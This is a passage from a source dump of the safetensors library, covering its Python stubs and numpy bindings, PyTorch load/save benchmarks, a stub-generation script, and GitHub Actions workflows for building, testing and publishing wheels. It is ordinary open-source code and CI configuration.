artifacts are properly created. 91 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.pyi: -------------------------------------------------------------------------------- 1 | # Generated content DO NOT EDIT 2 | @staticmethod 3 | def deserialize(bytes): 4 | """ 5 | Opens a safetensors lazily and returns tensors as asked 6 | 7 | Args: 8 | data (`bytes`): 9 | The byte content of a file 10 | 11 | Returns: 12 | (`List[str, Dict[str, Dict[str, any]]]`): 13 | The deserialized content is like: 14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] 15 | """ 16 | pass 17 | 18 | @staticmethod 19 | def serialize(tensor_dict, metadata=None): 20 | """ 21 | Serializes raw data. 22 | 23 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live 24 | long enough for the duration of the serialization. 25 | We will remove the need for the caller to hold references themselves when we drop support for 26 | python versions prior to 3.11 where the `PyBuffer` API is available. 27 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array, 28 | increasing its ref count preventing the gc from collecting it while we serialize. 29 | 30 | Args: 31 | tensor_dict (`Dict[str, Dict[Any]]`): 32 | The tensor dict is like: 33 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}} 34 | metadata (`Dict[str, str]`, *optional*): 35 | The optional purely text annotations 36 | 37 | Returns: 38 | (`bytes`): 39 | The serialized content. 40 | """ 41 | pass 42 | 43 | @staticmethod 44 | def serialize_file(tensor_dict, filename, metadata=None): 45 | """ 46 | Serializes raw data into file. 47 | 48 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live 49 | long enough for the duration of the serialization. 50 | We will remove the need for the caller to hold references themselves when we drop support for 51 | python versions prior to 3.11 where the `PyBuffer` API is available. 52 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array, 53 | increasing its ref count preventing the gc from collecting it while we serialize. 54 | 55 | Args: 56 | tensor_dict (`Dict[str, Dict[Any]]`): 57 | The tensor dict is like: 58 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}} 59 | filename (`str`, or `os.PathLike`): 60 | The name of the file to write into. 61 | metadata (`Dict[str, str]`, *optional*): 62 | The optional purely text annotations 63 | 64 | Returns: 65 | (`NoneType`): 66 | On success return None 67 | """ 68 | pass 69 | 70 | class safe_open: 71 | """ 72 | Opens a safetensors lazily and returns tensors as asked 73 | 74 | Args: 75 | filename (`str`, or `os.PathLike`): 76 | The filename to open 77 | 78 | framework (`str`): 79 | The framework you want you tensors in. Supported values: 80 | `pt`, `tf`, `flax`, `numpy`. 81 | 82 | device (`str`, defaults to `"cpu"`): 83 | The device on which you want the tensors. 84 | """ 85 | def __init__(self, filename, framework, device=...): 86 | pass 87 | 88 | def __enter__(self): 89 | """ 90 | Start the context manager 91 | """ 92 | pass 93 | 94 | def __exit__(self, _exc_type, _exc_value, _traceback): 95 | """ 96 | Exits the context manager 97 | """ 98 | pass 99 | 100 | def get_slice(self, name): 101 | """ 102 | Returns a full slice view object 103 | 104 | Args: 105 | name (`str`): 106 | The name of the tensor you want 107 | 108 | Returns: 109 | (`PySafeSlice`): 110 | A dummy object you can slice into to get a real tensor 111 | Example: 112 | ```python 113 | from safetensors import safe_open 114 | 115 | with safe_open("model.safetensors", framework="pt", device=0) as f: 116 | tensor_part = f.get_slice("embedding")[:, ::8] 117 | 118 | ``` 119 | """ 120 | pass 121 | 122 | def get_tensor(self, name): 123 | """ 124 | Returns a full tensor 125 | 126 | Args: 127 | name (`str`): 128 | The name of the tensor you want 129 | 130 | Returns: 131 | (`Tensor`): 132 | The tensor in the framework you opened the file for. 133 | 134 | Example: 135 | ```python 136 | from safetensors import safe_open 137 | 138 | with safe_open("model.safetensors", framework="pt", device=0) as f: 139 | tensor = f.get_tensor("embedding") 140 | 141 | ``` 142 | """ 143 | pass 144 | 145 | def keys(self): 146 | """ 147 | Returns the names of the tensors in the file. 148 | 149 | Returns: 150 | (`List[str]`): 151 | The name of the tensors contained in that file 152 | """ 153 | pass 154 | 155 | def metadata(self): 156 | """ 157 | Return the special non tensor information in the header 158 | 159 | Returns: 160 | (`Dict[str, str]`): 161 | The freeform metadata. 162 | """ 163 | pass 164 | 165 | def offset_keys(self): 166 | """ 167 | Returns the names of the tensors in the file, ordered by offset. 168 | 169 | Returns: 170 | (`List[str]`): 171 | The name of the tensors contained in that file 172 | """ 173 | pass 174 | 175 | class SafetensorError(Exception): 176 | """ 177 | Custom Python Exception for Safetensor errors. 178 | """ 179 | -------------------------------------------------------------------------------- /.github/workflows/python-release.yml: -------------------------------------------------------------------------------- 1 | # This file is autogenerated by maturin v1.7.4 2 | # To update, run 3 | # 4 | # maturin generate-ci github -m bindings/python/Cargo.toml 5 | # 6 | name: CI 7 | 8 | on: 9 | push: 10 | branches: 11 | - main 12 | - master 13 | tags: 14 | - '*' 15 | pull_request: 16 | workflow_dispatch: 17 | 18 | permissions: 19 | contents: read 20 | 21 | jobs: 22 | linux: 23 | runs-on: ${{ matrix.platform.runner }} 24 | strategy: 25 | matrix: 26 | platform: 27 | - runner: ubuntu-latest 28 | target: x86_64 29 | - runner: ubuntu-latest 30 | target: x86 31 | - runner: ubuntu-latest 32 | target: aarch64 33 | - runner: ubuntu-latest 34 | target: armv7 35 | - runner: ubuntu-latest 36 | target: s390x 37 | - runner: ubuntu-latest 38 | target: ppc64le 39 | steps: 40 | - uses: actions/checkout@v6 41 | - uses: actions/setup-python@v6 42 | with: 43 | python-version: 3.x 44 | - name: Build wheels 45 | uses: PyO3/maturin-action@v1 46 | with: 47 | target: ${{ matrix.platform.target }} 48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 49 | sccache: 'true' 50 | manylinux: auto 51 | - name: Upload wheels 52 | uses: actions/upload-artifact@v6 53 | with: 54 | name: wheels-linux-${{ matrix.platform.target }} 55 | path: dist 56 | 57 | musllinux: 58 | runs-on: ${{ matrix.platform.runner }} 59 | strategy: 60 | matrix: 61 | platform: 62 | - runner: ubuntu-latest 63 | target: x86_64 64 | - runner: ubuntu-latest 65 | target: x86 66 | - runner: ubuntu-latest 67 | target: aarch64 68 | - runner: ubuntu-latest 69 | target: armv7 70 | steps: 71 | - uses: actions/checkout@v6 72 | - uses: actions/setup-python@v6 73 | with: 74 | python-version: 3.x 75 | - name: Build wheels 76 | uses: PyO3/maturin-action@v1 77 | with: 78 | target: ${{ matrix.platform.target }} 79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 80 | sccache: 'true' 81 | manylinux: musllinux_1_2 82 | - name: Upload wheels 83 | uses: actions/upload-artifact@v6 84 | with: 85 | name: wheels-musllinux-${{ matrix.platform.target }} 86 | path: dist 87 | 88 | windows: 89 | runs-on: ${{ matrix.platform.runner }} 90 | strategy: 91 | matrix: 92 | platform: 93 | - runner: windows-latest 94 | target: x64 95 | - runner: windows-latest 96 | target: x86 97 | - runner: windows-11-arm 98 | target: arm64 99 | steps: 100 | - uses: actions/checkout@v6 101 | - uses: actions/setup-python@v6 102 | with: 103 | python-version: 3.x 104 | architecture: ${{ matrix.platform.target }} 105 | - name: Build wheels 106 | uses: PyO3/maturin-action@v1 107 | with: 108 | target: ${{ matrix.platform.target == 'arm64' && 'aarch64-pc-windows-msvc' || matrix.platform.target }} 109 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 110 | sccache: 'true' 111 | - name: Upload wheels 112 | uses: actions/upload-artifact@v6 113 | with: 114 | name: wheels-windows-${{ matrix.platform.target }} 115 | path: dist 116 | 117 | macos: 118 | runs-on: ${{ matrix.platform.runner }} 119 | strategy: 120 | matrix: 121 | platform: 122 | - runner: macos-15-intel 123 | target: x86_64 124 | - runner: macos-14 125 | target: aarch64 126 | steps: 127 | - uses: actions/checkout@v6 128 | - uses: actions/setup-python@v6 129 | with: 130 | python-version: 3.x 131 | - name: Build wheels 132 | uses: PyO3/maturin-action@v1 133 | with: 134 | target: ${{ matrix.platform.target }} 135 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 136 | sccache: 'true' 137 | - name: Upload wheels 138 | uses: actions/upload-artifact@v6 139 | with: 140 | name: wheels-macos-${{ matrix.platform.target }} 141 | path: dist 142 | 143 | sdist: 144 | runs-on: ubuntu-latest 145 | steps: 146 | - uses: actions/checkout@v6 147 | - name: Build sdist 148 | uses: PyO3/maturin-action@v1 149 | with: 150 | command: sdist 151 | args: --out dist --manifest-path bindings/python/Cargo.toml 152 | - name: Upload sdist 153 | uses: actions/upload-artifact@v6 154 | with: 155 | name: wheels-sdist 156 | path: dist 157 | 158 | release: 159 | name: Release 160 | runs-on: ubuntu-latest 161 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} 162 | needs: [linux, musllinux, windows, macos, sdist] 163 | permissions: 164 | # Use to sign the release artifacts 165 | id-token: write 166 | # Used to upload release artifacts 167 | contents: write 168 | # Used to generate artifact attestation 169 | attestations: write 170 | steps: 171 | - uses: actions/download-artifact@v7 172 | - name: Generate artifact attestation 173 | uses: actions/attest-build-provenance@v3 174 | with: 175 | subject-path: 'wheels-*/*' 176 | - name: Publish to PyPI 177 | if: "startsWith(github.ref, 'refs/tags/')" 178 | uses: PyO3/maturin-action@v1 179 | env: 180 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} 181 | with: 182 | command: upload 183 | args: --non-interactive --skip-existing wheels-*/* 184 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/numpy.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from typing import Dict, List, Optional, Union 4 | 5 | import numpy as np 6 | 7 | from safetensors import deserialize, safe_open, serialize, serialize_file 8 | 9 | 10 | def _flatten( 11 | tensor_dict: Dict[str, np.ndarray], keep_alive_buffer: List 12 | ) -> Dict[str, Dict]: 13 | flattened = {} 14 | for k, v in tensor_dict.items(): 15 | tensor = v 16 | if not _is_little_endian(tensor): 17 | tensor = tensor.byteswap(inplace=False) 18 | keep_alive_buffer.append(tensor) 19 | flattened[k] = { 20 | "dtype": tensor.dtype.name, 21 | "shape": tensor.shape, 22 | "data_ptr": tensor.ctypes.data, 23 | "data_len": tensor.nbytes, 24 | } 25 | return flattened 26 | 27 | 28 | def save( 29 | tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None 30 | ) -> bytes: 31 | """ 32 | Saves a dictionary of tensors into raw bytes in safetensors format. 33 | 34 | Args: 35 | tensor_dict (`Dict[str, np.ndarray]`): 36 | The incoming tensors. Tensors need to be contiguous and dense. 37 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 38 | Optional text only metadata you might want to save in your header. 39 | For instance it can be useful to specify more about the underlying 40 | tensors. This is purely informative and does not affect tensor loading. 41 | 42 | Returns: 43 | `bytes`: The raw bytes representing the format 44 | 45 | Example: 46 | 47 | ```python 48 | from safetensors.numpy import save 49 | import numpy as np 50 | 51 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 52 | byte_data = save(tensors) 53 | ``` 54 | """ 55 | keep_alive_buffer = [] # to keep byteswapped tensors alive 56 | serialized = serialize(_flatten(tensor_dict, keep_alive_buffer), metadata=metadata) 57 | result = bytes(serialized) 58 | return result 59 | 60 | 61 | def save_file( 62 | tensor_dict: Dict[str, np.ndarray], 63 | filename: Union[str, os.PathLike], 64 | metadata: Optional[Dict[str, str]] = None, 65 | ) -> None: 66 | """ 67 | Saves a dictionary of tensors into raw bytes in safetensors format. 68 | 69 | Args: 70 | tensor_dict (`Dict[str, np.ndarray]`): 71 | The incoming tensors. Tensors need to be contiguous and dense. 72 | filename (`str`, or `os.PathLike`)): 73 | The filename we're saving into. 74 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 75 | Optional text only metadata you might want to save in your header. 76 | For instance it can be useful to specify more about the underlying 77 | tensors. This is purely informative and does not affect tensor loading. 78 | 79 | Returns: 80 | `None` 81 | 82 | Example: 83 | 84 | ```python 85 | from safetensors.numpy import save_file 86 | import numpy as np 87 | 88 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 89 | save_file(tensors, "model.safetensors") 90 | ``` 91 | """ 92 | keep_alive_buffer = [] # to keep byteswapped tensors alive 93 | serialize_file( 94 | _flatten(tensor_dict, keep_alive_buffer), filename, metadata=metadata 95 | ) 96 | 97 | 98 | def load(data: bytes) -> Dict[str, np.ndarray]: 99 | """ 100 | Loads a safetensors file into numpy format from pure bytes. 101 | 102 | Args: 103 | data (`bytes`): 104 | The content of a safetensors file 105 | 106 | Returns: 107 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu 108 | 109 | Example: 110 | 111 | ```python 112 | from safetensors.numpy import load 113 | 114 | file_path = "./my_folder/bert.safetensors" 115 | with open(file_path, "rb") as f: 116 | data = f.read() 117 | 118 | loaded = load(data) 119 | ``` 120 | """ 121 | flat = deserialize(data) 122 | return _view2np(flat) 123 | 124 | 125 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: 126 | """ 127 | Loads a safetensors file into numpy format. 128 | 129 | Args: 130 | filename (`str`, or `os.PathLike`)): 131 | The name of the file which contains the tensors 132 | 133 | Returns: 134 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` 135 | 136 | Example: 137 | 138 | ```python 139 | from safetensors.numpy import load_file 140 | 141 | file_path = "./my_folder/bert.safetensors" 142 | loaded = load_file(file_path) 143 | ``` 144 | """ 145 | result = {} 146 | with safe_open(filename, framework="np") as f: 147 | for k in f.offset_keys(): 148 | result[k] = f.get_tensor(k) 149 | return result 150 | 151 | 152 | _TYPES = { 153 | "F64": np.float64, 154 | "F32": np.float32, 155 | "F16": np.float16, 156 | "I64": np.int64, 157 | "U64": np.uint64, 158 | "I32": np.int32, 159 | "U32": np.uint32, 160 | "I16": np.int16, 161 | "U16": np.uint16, 162 | "I8": np.int8, 163 | "U8": np.uint8, 164 | "BOOL": bool, 165 | "C64": np.complex64, 166 | } 167 | 168 | 169 | def _getdtype(dtype_str: str) -> np.dtype: 170 | return _TYPES[dtype_str] 171 | 172 | 173 | def _view2np(safeview) -> Dict[str, np.ndarray]: 174 | result = {} 175 | for k, v in safeview: 176 | dtype = _getdtype(v["dtype"]) 177 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) 178 | result[k] = arr 179 | return result 180 | 181 | 182 | def _is_little_endian(tensor: np.ndarray) -> bool: 183 | byteorder = tensor.dtype.byteorder 184 | if byteorder == "=": 185 | if sys.byteorder == "little": 186 | return True 187 | else: 188 | return False 189 | elif byteorder == "|": 190 | return True 191 | elif byteorder == "<": 192 | return True 193 | elif byteorder == ">": 194 | return False 195 | raise ValueError(f"Unexpected byte order {byteorder}") 196 | -------------------------------------------------------------------------------- /bindings/python/benches/test_pt.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import pytest 5 | import torch 6 | 7 | from safetensors.torch import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = torch.zeros((50257, 768)) 13 | tensors["wpe"] = torch.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) 28 | tensors["ln_f.weight"] = torch.zeros((768)) 29 | tensors["ln_f.bias"] = torch.zeros((768)) 30 | return tensors 31 | 32 | 33 | def create_lora(n_layers: int): 34 | tensors = {} 35 | for i in range(n_layers): 36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) 37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) 38 | return tensors 39 | 40 | 41 | def test_pt_pt_load_cpu(benchmark): 42 | # benchmark something 43 | weights = create_gpt2(12) 44 | with tempfile.NamedTemporaryFile(delete=False) as f: 45 | torch.save(weights, f) 46 | result = benchmark(torch.load, f.name) 47 | os.unlink(f.name) 48 | 49 | for k, v in weights.items(): 50 | tv = result[k] 51 | assert torch.allclose(v, tv) 52 | 53 | 54 | def test_pt_sf_load_cpu(benchmark): 55 | # benchmark something 56 | weights = create_gpt2(12) 57 | with tempfile.NamedTemporaryFile(delete=False) as f: 58 | save_file(weights, f.name) 59 | result = benchmark(load_file, f.name) 60 | os.unlink(f.name) 61 | 62 | for k, v in weights.items(): 63 | tv = result[k] 64 | assert torch.allclose(v, tv) 65 | 66 | 67 | def test_pt_pt_load_cpu_small(benchmark): 68 | weights = create_lora(500) 69 | with tempfile.NamedTemporaryFile(delete=False) as f: 70 | torch.save(weights, f) 71 | result = benchmark(torch.load, f.name) 72 | os.unlink(f.name) 73 | 74 | for k, v in weights.items(): 75 | tv = result[k] 76 | assert torch.allclose(v, tv) 77 | 78 | 79 | def test_pt_sf_load_cpu_small(benchmark): 80 | weights = create_lora(500) 81 | 82 | with tempfile.NamedTemporaryFile(delete=False) as f: 83 | save_file(weights, f.name) 84 | result = benchmark(load_file, f.name) 85 | os.unlink(f.name) 86 | 87 | for k, v in weights.items(): 88 | tv = result[k] 89 | assert torch.allclose(v, tv) 90 | 91 | 92 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 93 | def test_pt_pt_load_gpu(benchmark): 94 | # benchmark something 95 | weights = create_gpt2(12) 96 | with tempfile.NamedTemporaryFile(delete=False) as f: 97 | torch.save(weights, f) 98 | result = benchmark(torch.load, f.name, map_location="cuda:0") 99 | os.unlink(f.name) 100 | 101 | for k, v in weights.items(): 102 | v = v.cuda() 103 | tv = result[k] 104 | assert torch.allclose(v, tv) 105 | 106 | 107 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 108 | def test_pt_sf_load_gpu(benchmark): 109 | # benchmark something 110 | weights = create_gpt2(12) 111 | with tempfile.NamedTemporaryFile(delete=False) as f: 112 | save_file(weights, f.name) 113 | result = benchmark(load_file, f.name, device="cuda:0") 114 | os.unlink(f.name) 115 | 116 | for k, v in weights.items(): 117 | v = v.cuda() 118 | tv = result[k] 119 | assert torch.allclose(v, tv) 120 | 121 | 122 | @pytest.mark.skipif( 123 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), 124 | reason="requires mps", 125 | ) 126 | def test_pt_pt_load_mps(benchmark): 127 | # benchmark something 128 | weights = create_gpt2(12) 129 | with tempfile.NamedTemporaryFile(delete=False) as f: 130 | torch.save(weights, f) 131 | result = benchmark(torch.load, f.name, map_location="mps") 132 | os.unlink(f.name) 133 | 134 | for k, v in weights.items(): 135 | v = v.to(device="mps") 136 | tv = result[k] 137 | assert torch.allclose(v, tv) 138 | 139 | 140 | @pytest.mark.skipif( 141 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), 142 | reason="requires mps", 143 | ) 144 | def test_pt_sf_load_mps(benchmark): 145 | # benchmark something 146 | weights = create_gpt2(12) 147 | with tempfile.NamedTemporaryFile(delete=False) as f: 148 | save_file(weights, f.name) 149 | result = benchmark(load_file, f.name, device="mps") 150 | os.unlink(f.name) 151 | 152 | for k, v in weights.items(): 153 | v = v.to(device="mps") 154 | tv = result[k] 155 | assert torch.allclose(v, tv) 156 | 157 | 158 | def test_pt_sf_save_cpu(benchmark): 159 | weights = create_gpt2(12) 160 | 161 | filename = "tmp.safetensors" 162 | 163 | # XXX: On some platforms (tested on Linux x86_64 ext4), writing to an already existing file is slower than creating a new one. 164 | # On others, such as MacOS (APFS), it's the opposite. To have more consistent benchmarks, 165 | # we ensure the file does not exist before each write, which is also closer to real world usage. 166 | def setup(): 167 | try: 168 | os.unlink(filename) 169 | except Exception: 170 | pass 171 | 172 | benchmark.pedantic( 173 | save_file, args=(weights, filename), setup=setup, iterations=1, rounds=5 174 | ) 175 | 176 | # Clean up files 177 | os.unlink(filename) 178 | -------------------------------------------------------------------------------- /bindings/python/stub.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import inspect 3 | import os 4 | import subprocess 5 | import tempfile 6 | 7 | INDENT = " " * 4 8 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" 9 | 10 | 11 | def do_indent(text: str, indent: str): 12 | return text.replace("\n", f"\n{indent}") 13 | 14 | 15 | def function(obj, indent, text_signature=None): 16 | if text_signature is None: 17 | text_signature = obj.__text_signature__ 18 | string = "" 19 | string += f"{indent}def {obj.__name__}{text_signature}:\n" 20 | indent += INDENT 21 | string += f'{indent}"""\n' 22 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n" 23 | string += f'{indent}"""\n' 24 | string += f"{indent}pass\n" 25 | string += "\n" 26 | string += "\n" 27 | return string 28 | 29 | 30 | def member_sort(member): 31 | if inspect.isclass(member): 32 | value = 10 + len(inspect.getmro(member)) 33 | else: 34 | value = 1 35 | return value 36 | 37 | 38 | def fn_predicate(obj): 39 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) 40 | if value: 41 | return ( 42 | obj.__doc__ 43 | and obj.__text_signature__ 44 | and ( 45 | not obj.__name__.startswith("_") 46 | or obj.__name__ in {"__enter__", "__exit__"} 47 | ) 48 | ) 49 | if inspect.isgetsetdescriptor(obj): 50 | return obj.__doc__ and not obj.__name__.startswith("_") 51 | return False 52 | 53 | 54 | def get_module_members(module): 55 | members = [ 56 | member 57 | for name, member in inspect.getmembers(module) 58 | if not name.startswith("_") and not inspect.ismodule(member) 59 | ] 60 | members.sort(key=member_sort) 61 | return members 62 | 63 | 64 | def pyi_file(obj, indent=""): 65 | string = "" 66 | if inspect.ismodule(obj): 67 | string += GENERATED_COMMENT 68 | members = get_module_members(obj) 69 | for member in members: 70 | string += pyi_file(member, indent) 71 | 72 | elif inspect.isclass(obj): 73 | indent += INDENT 74 | mro = inspect.getmro(obj) 75 | if len(mro) > 2: 76 | inherit = f"({mro[1].__name__})" 77 | else: 78 | inherit = "" 79 | string += f"class {obj.__name__}{inherit}:\n" 80 | 81 | body = "" 82 | if obj.__doc__: 83 | body += ( 84 | f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' 85 | ) 86 | 87 | fns = inspect.getmembers(obj, fn_predicate) 88 | 89 | # Init 90 | if obj.__text_signature__: 91 | signature = obj.__text_signature__.replace("(", "(self, ") 92 | body += f"{indent}def __init__{signature}:\n" 93 | body += f"{indent + INDENT}pass\n" 94 | body += "\n" 95 | 96 | for name, fn in fns: 97 | body += pyi_file(fn, indent=indent) 98 | 99 | if not body: 100 | body += f"{indent}pass\n" 101 | 102 | string += body 103 | string += "\n\n" 104 | 105 | elif inspect.isbuiltin(obj): 106 | string += f"{indent}@staticmethod\n" 107 | string += function(obj, indent) 108 | 109 | elif inspect.ismethoddescriptor(obj): 110 | string += function(obj, indent) 111 | 112 | elif inspect.isgetsetdescriptor(obj): 113 | # TODO it would be interesing to add the setter maybe ? 114 | string += f"{indent}@property\n" 115 | string += function(obj, indent, text_signature="(self)") 116 | else: 117 | raise Exception(f"Object {obj} is not supported") 118 | return string 119 | 120 | 121 | def py_file(module, origin): 122 | members = get_module_members(module) 123 | 124 | string = GENERATED_COMMENT 125 | string += f"from .. import {origin}\n" 126 | string += "\n" 127 | for member in members: 128 | name = member.__name__ 129 | string += f"{name} = {origin}.{name}\n" 130 | return string 131 | 132 | 133 | def do_black(content): 134 | content = content.replace("$self", "self") 135 | with tempfile.NamedTemporaryFile(mode="w+", suffix=".pyi") as f: 136 | f.write(content) 137 | f.flush() 138 | _ = subprocess.check_output(["ruff", "format", f.name]) 139 | f.seek(0) 140 | new_content = f.read() 141 | return new_content 142 | 143 | 144 | def write(module, directory, origin, check=False): 145 | submodules = [ 146 | (name, member) 147 | for name, member in inspect.getmembers(module) 148 | if inspect.ismodule(member) 149 | ] 150 | 151 | filename = os.path.join(directory, "__init__.pyi") 152 | pyi_content = pyi_file(module) 153 | pyi_content = do_black(pyi_content) 154 | os.makedirs(directory, exist_ok=True) 155 | if check: 156 | with open(filename, "r") as f: 157 | data = f.read() 158 | assert data == pyi_content, ( 159 | f"The content of {filename} seems outdated, please run `python stub.py`" 160 | ) 161 | else: 162 | with open(filename, "w") as f: 163 | f.write(pyi_content) 164 | 165 | filename = os.path.join(directory, "__init__.py") 166 | py_content = py_file(module, origin) 167 | py_content = do_black(py_content) 168 | os.makedirs(directory, exist_ok=True) 169 | 170 | is_auto = False 171 | if not os.path.exists(filename): 172 | is_auto = True 173 | else: 174 | with open(filename, "r") as f: 175 | line = f.readline() 176 | if line == GENERATED_COMMENT: 177 | is_auto = True 178 | 179 | if is_auto: 180 | if check: 181 | with open(filename, "r") as f: 182 | data = f.read() 183 | assert data == py_content, ( 184 | f"The content of {filename} seems outdated, please run `python stub.py`" 185 | ) 186 | else: 187 | with open(filename, "w") as f: 188 | f.write(py_content) 189 | 190 | for name, submodule in submodules: 191 | write(submodule, os.path.join(directory, name), f"{name}", check=check) 192 | 193 | 194 | if __name__ == "__main__": 195 | parser = argparse.ArgumentParser() 196 | parser.add_argument("--check", action="store_true") 197 | 198 | args = parser.parse_args() 199 | import safetensors 200 | 201 | write( 202 | safetensors._safetensors_rust, 203 | "py_src/safetensors/", 204 | "safetensors", 205 | check=args.check, 206 | ) 207 | -------------------------------------------------------------------------------- /.github/workflows/python.yml: -------------------------------------------------------------------------------- 1 | name: Python 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build_and_test: 8 | name: Check everything builds & tests 9 | runs-on: ${{ matrix.os }} 10 | strategy: 11 | matrix: 12 | os: [ubuntu-latest, windows-latest] 13 | # Lowest and highest, no version specified so that 14 | # new releases get automatically tested against 15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64", numpy: numpy==1.26.4}, {torch: torch, python: "3.12", arch: "x64", numpy: numpy}] 16 | # TODO this would include macos ARM target. 17 | # however jax has an illegal instruction issue 18 | # that exists only in CI (probably difference in instruction support). 19 | # include: 20 | # - os: macos-latest 21 | # version: 22 | # torch: torch 23 | # python: "3.11" 24 | include: 25 | - os: ubuntu-latest 26 | version: 27 | torch: torch 28 | python: "3.13" 29 | numpy: numpy 30 | arch: "x64-freethreaded" 31 | - os: macos-15-intel 32 | version: 33 | torch: torch==1.10 34 | numpy: "numpy==1.26" 35 | python: "3.9" 36 | arch: "x64" 37 | - os: macos-latest 38 | version: 39 | torch: torch 40 | python: "3.12" 41 | numpy: numpy 42 | arch: "arm64" 43 | - os: windows-11-arm 44 | version: 45 | torch: torch 46 | python: "3.12" 47 | numpy: numpy 48 | arch: "arm64" 49 | defaults: 50 | run: 51 | working-directory: ./bindings/python 52 | steps: 53 | - name: Checkout repository 54 | uses: actions/checkout@v6 55 | 56 | - name: Install Rust 57 | uses: dtolnay/rust-toolchain@stable 58 | with: 59 | components: rustfmt, clippy 60 | 61 | - name: Cargo install audit 62 | run: cargo install cargo-audit 63 | 64 | - uses: Swatinem/rust-cache@v2 65 | with: 66 | workspaces: "bindings/python" 67 | 68 | - name: Install Python 69 | uses: actions/setup-python@v6 70 | with: 71 | python-version: ${{ matrix.version.python }} 72 | architecture: ${{ matrix.version.arch }} 73 | 74 | - name: Lint with RustFmt 75 | run: cargo fmt -- --check 76 | 77 | - name: Lint with Clippy 78 | run: cargo clippy --all-targets --all-features -- -D warnings 79 | 80 | - name: Run Audit 81 | run: cargo audit -D warnings 82 | 83 | # - name: Install 84 | # run: | 85 | # pip install -U pip 86 | 87 | - name: Install (torch) 88 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 89 | run: | 90 | pip install ${{ matrix.version.numpy }} 91 | pip install ${{ matrix.version.torch }} 92 | shell: bash 93 | 94 | - name: Install (torch freethreaded) 95 | if: matrix.version.arch == 'x64-freethreaded' 96 | run: | 97 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126 98 | shell: bash 99 | 100 | - name: Install (torch windows arm64) 101 | if: matrix.os == 'windows-11-arm' 102 | run: | 103 | pip install ${{ matrix.version.numpy }} 104 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cpu 105 | shell: bash 106 | 107 | - name: Install (hdf5 non windows) 108 | if: matrix.os == 'ubuntu-latest' && matrix.version.arch != 'x64-freethreaded' 109 | run: | 110 | sudo apt-get update 111 | sudo apt-get install libhdf5-dev 112 | 113 | - name: Install (tensorflow) 114 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 115 | run: | 116 | pip install .[tensorflow] 117 | # Force reinstall of numpy, tensorflow uses numpy 2 even on 3.9 118 | pip install ${{ matrix.version.numpy }} 119 | shell: bash 120 | 121 | - name: Install (jax, flax) 122 | if: runner.os != 'Windows' && matrix.version.arch != 'x64-freethreaded' 123 | run: 124 | pip install .[jax] 125 | shell: bash 126 | 127 | - name: Install (mlx) 128 | if: matrix.os == 'macos-latest' 129 | run: | 130 | pip install .[mlx] 131 